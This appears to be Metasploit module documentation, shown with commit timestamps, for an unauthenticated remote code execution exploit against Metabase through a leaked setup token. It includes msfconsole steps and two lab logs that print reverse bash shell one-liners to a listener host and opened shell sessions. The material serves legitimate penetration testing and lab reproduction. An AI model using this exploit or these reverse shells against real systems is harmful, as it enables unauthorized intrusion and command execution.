2023-07-28 16:09:56 -04:00
|
|
|
## Vulnerable Application
|
|
|
|
|
|
|
|
|
|
Metabase versions before 0.46.6.1 contain a flaw where the secret setup-token
|
|
|
|
|
is accessible even after the setup process has been completed. With this token
|
|
|
|
|
a user is able to submit the setup functionality to create a new database.
|
|
|
|
|
When creating a new database, an H2 database string is created with a TRIGGER
|
|
|
|
|
that allows for code execution. We use a sample database for our connection
|
|
|
|
|
string to prevent corrupting real databases.
|
|
|
|
|
|
2024-10-17 09:57:03 +01:00
|
|
|
Successfully tested against Metabase 0.46.6, 0.44.4, 0.42.1.
|
2023-07-28 16:09:56 -04:00
|
|
|
|
|
|
|
|
### Install
|
|
|
|
|
|
2024-10-17 09:57:03 +01:00
|
|
|
Example of impacted versions:
|
|
|
|
|
|
2023-07-28 16:09:56 -04:00
|
|
|
```
|
2024-10-17 09:57:03 +01:00
|
|
|
docker run --rm -p 3000:3000 --name metabase metabase/metabase:v0.46.6
|
|
|
|
|
docker run --rm -p 3000:3000 --name metabase metabase/metabase:v0.44.4
|
|
|
|
|
docker run --rm -p 3000:3000 --name metabase metabase/metabase:v0.42.1
|
2023-07-28 16:09:56 -04:00
|
|
|
```
|
|
|
|
|
|
|
|
|
|
## Verification Steps
|
|
|
|
|
|
|
|
|
|
1. Install the application
|
|
|
|
|
1. Start msfconsole
|
|
|
|
|
1. Do: `use exploit/linux/http/metabase_setup_token_rce`
|
|
|
|
|
1. Do: `set rhosts [ip]`
|
|
|
|
|
1. Do: `run`
|
|
|
|
|
1. You should get a shell.
|
|
|
|
|
|
|
|
|
|
## Options
|
|
|
|
|
|
|
|
|
|
## Scenarios
|
|
|
|
|
|
2024-10-17 09:57:03 +01:00
|
|
|
### Metabase 0.42.1 on Docker
|
|
|
|
|
|
|
|
|
|
```
|
2025-07-17 09:53:40 +01:00
|
|
|
msf exploit(linux/http/metabase_setup_token_rce) > run rhost=192.168.123.1 lhost=192.168.123.1 rport=3000
|
2024-10-17 09:57:03 +01:00
|
|
|
[*] Reloading module...
|
|
|
|
|
|
|
|
|
|
[+] bash -c '0<&30-;exec 30<>/dev/tcp/192.168.123.1/4444;sh <&30 >&30 2>&30'
|
|
|
|
|
[*] Started reverse TCP handler on 192.168.123.1:4444
|
|
|
|
|
[*] Running automatic check ("set AutoCheck false" to disable)
|
|
|
|
|
[+] The target appears to be vulnerable. Version Detected: 0.42.1
|
|
|
|
|
[+] Found setup token: e02ce681-0cf7-416f-a205-75656b168b4c
|
|
|
|
|
[*] Sending exploit (may take a few seconds)
|
|
|
|
|
[*] Command shell session 1 opened (192.168.123.1:4444 -> 192.168.123.1:58422) at 2024-10-17 09:59:25 +0100
|
|
|
|
|
|
|
|
|
|
whoami
|
|
|
|
|
metabase
|
|
|
|
|
```
|
|
|
|
|
|
2023-07-28 16:09:56 -04:00
|
|
|
### Metabase 0.46.6 on Docker
|
|
|
|
|
|
|
|
|
|
```
|
2025-07-17 09:53:40 +01:00
|
|
|
msf > use exploit/linux/http/metabase_setup_token_rce
|
2023-07-28 16:09:56 -04:00
|
|
|
[*] Using configured payload cmd/unix/reverse_bash
|
2025-07-17 09:53:40 +01:00
|
|
|
msf exploit(linux/http/metabase_setup_token_rce) > set rhosts 127.0.0.1
|
2023-07-28 16:09:56 -04:00
|
|
|
rhosts => 127.0.0.1
|
2025-07-17 09:53:40 +01:00
|
|
|
msf exploit(linux/http/metabase_setup_token_rce) > set lhost 111.111.11.111
|
2023-07-28 16:09:56 -04:00
|
|
|
lhost => 111.111.11.111
|
2025-07-17 09:53:40 +01:00
|
|
|
msf exploit(linux/http/metabase_setup_token_rce) > set verbose true
|
2023-07-28 16:09:56 -04:00
|
|
|
verbose => true
|
2025-07-17 09:53:40 +01:00
|
|
|
msf exploit(linux/http/metabase_setup_token_rce) > exploit
|
2023-07-28 16:09:56 -04:00
|
|
|
|
|
|
|
|
[+] bash -c '0<&46-;exec 46<>/dev/tcp/111.111.11.111/4444;sh <&46 >&46 2>&46'
|
|
|
|
|
[*] Started reverse TCP handler on 111.111.11.111:4444
|
|
|
|
|
[*] Running automatic check ("set AutoCheck false" to disable)
|
|
|
|
|
[+] The target appears to be vulnerable. Version Detected: 0.46.6
|
|
|
|
|
[+] Found setup token: 45a2c97a-97f5-4a89-8f37-769b13411d16
|
|
|
|
|
[*] Sending exploit
|
|
|
|
|
[*] Command shell session 1 opened (111.111.11.111:4444 -> 222.22.2.2:55650) at 2023-07-28 12:48:47 +0000
|
|
|
|
|
|
|
|
|
|
id
|
|
|
|
|
uid=2000(metabase) gid=2000(metabase) groups=2000(metabase),2000(metabase)
|
|
|
|
|
```
|
